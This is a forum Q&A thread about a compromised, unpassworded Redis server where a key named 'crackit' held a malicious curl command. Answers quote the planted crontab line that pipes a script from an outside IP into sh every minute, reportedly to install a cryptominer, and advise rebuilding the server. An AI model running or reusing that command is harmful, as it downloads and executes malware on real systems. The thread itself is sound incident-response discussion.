2

When i put keys * for getting all pairs, one key have named as

crackit

Then i use below command to get its value 

get crackit

its shows the below url, which looks suspicious.

/usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh.

Google search results shows a chinese language forum named as

https://www.v2ex.com/t/373529( I didn't understand language of this site)

I thought there is some intrusion. I immediately delete the all keys . I have no idea what happen around my redis

SuperKrish
  • 177
  • 5

2 Answers2

3

OP given url to the forum mentioned that the developer cloud server redis has been compromised, an entry has been added to crontab. i.e. 

*/1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh

The rest of the commenter mentioned that this is a possible hack that installs Bitcoin miners inside the system.

I agree with @Itamar Haber, you must redeploy your server from scratch. Simple application clean up is not enough.

mootmoot
  • 2,387
  • 10
  • 16
2

Your server is accessible to the world and the Redis process is not protected by a password. This allows a cracker to try and exploit Redis to gain access to your system.

My recommendations:

  1. Burn the server
  2. Reinstall and configure with a password at the very least.
Itamar Haber
  • 136
  • 3